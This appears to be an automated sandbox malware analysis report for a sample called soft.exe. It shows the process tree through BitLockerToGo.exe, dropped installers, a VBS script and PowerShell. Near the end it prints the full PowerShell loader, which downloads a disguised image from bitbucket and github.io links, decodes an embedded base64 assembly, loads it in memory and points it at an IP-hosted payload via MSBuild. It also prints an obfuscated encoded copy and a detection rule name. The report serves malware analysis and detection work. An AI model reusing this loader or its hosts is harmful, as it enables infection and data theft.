                            Source: Process Memory Space: powershell.exe PID: 4704, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                            Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@34/49@5/9
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02B9F8E0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,13_2_02B9F8E0
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,11_2_00409448
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,12_2_0045568C
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeCode function: 14_2_00007FF7444E1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,14_2_00007FF7444E1C0C
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00455EB4 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,12_2_00455EB4
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: CreateServiceA,13_2_004021EC
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0046E5B8 GetVersion,CoCreateInstance,12_2_0046E5B8
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: 11_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,11_2_00409C34
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_00401C5C StartServiceCtrlDispatcherA,13_2_00401C5C
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_00401C5C StartServiceCtrlDispatcherA,13_2_00401C5C
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\success[1].htmJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5688:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5132:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6080:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeFile created: C:\Users\user~1\AppData\Local\Temp\is-IL2KP.tmpJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 67c2163c9db39.vbs
                            Source: soft.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpFile read: C:\Windows\win.iniJump to behavior
                            Source: C:\Users\user\Desktop\soft.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                            Source: ssdtoolbox.exe, ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                            Source: ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                            Source: ssdtoolbox.exe, ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                            Source: ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                            Source: ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                            Source: ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                            Source: ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                            Source: ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                            Source: ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                            Source: ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                            Source: ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                            Source: ssdtoolbox.exe, ssdtoolbox.exe, 0000000D.00000002.2547923338.000000006096F000.00000002.00000001.01000000.0000000C.sdmp, sqlite3.dll.13.dr, is-PEPS4.tmp.12.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                            Source: soft.exeVirustotal: Detection: 26%
                            Source: soft.exeReversingLabs: Detection: 26%
                            Source: N7LnRW81Rfq.exeString found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                            Source: soft.exeString found in binary or memory: net/addrselect.go
                            Source: soft.exeString found in binary or memory: github.com/saferwall/pe@v1.5.6/loadconfig.go
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                            Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                            Source: unknownProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                            Source: unknownProcess created: C:\Users\user\Desktop\soft.exe "C:\Users\user\Desktop\soft.exe"
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                            Source: C:\Users\user\Desktop\soft.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe "C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe"
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeProcess created: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp "C:\Users\user~1\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp" /SL5="$A0242,3545097,56832,C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe"
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpProcess created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe "C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe" -i
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe "C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe"
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 67c2163c9db39.vbs
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZwBm@Gc@Z@Bm@GY@ZgBm@GY@ZgBm@GY@ZgBm@GY@Zw@v@Gc@Z@Bm@Gc@Z@Bm@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                            Source: C:\Users\user\Desktop\soft.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                            Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe "C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe"Jump to behavior
                            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe "C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeProcess created: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp "C:\Users\user~1\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp" /SL5="$A0242,3545097,56832,C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpProcess created: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe "C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe" -iJump to behavior
                            Source: C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 67c2163c9db39.vbsJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" Jump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZwBm@Gc@Z@Bm@GY@ZgBm@GY@ZgBm@GY@ZgBm@GY@Zw@v@Gc@Z@Bm@Gc@Z@Bm@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@CJump to behavior
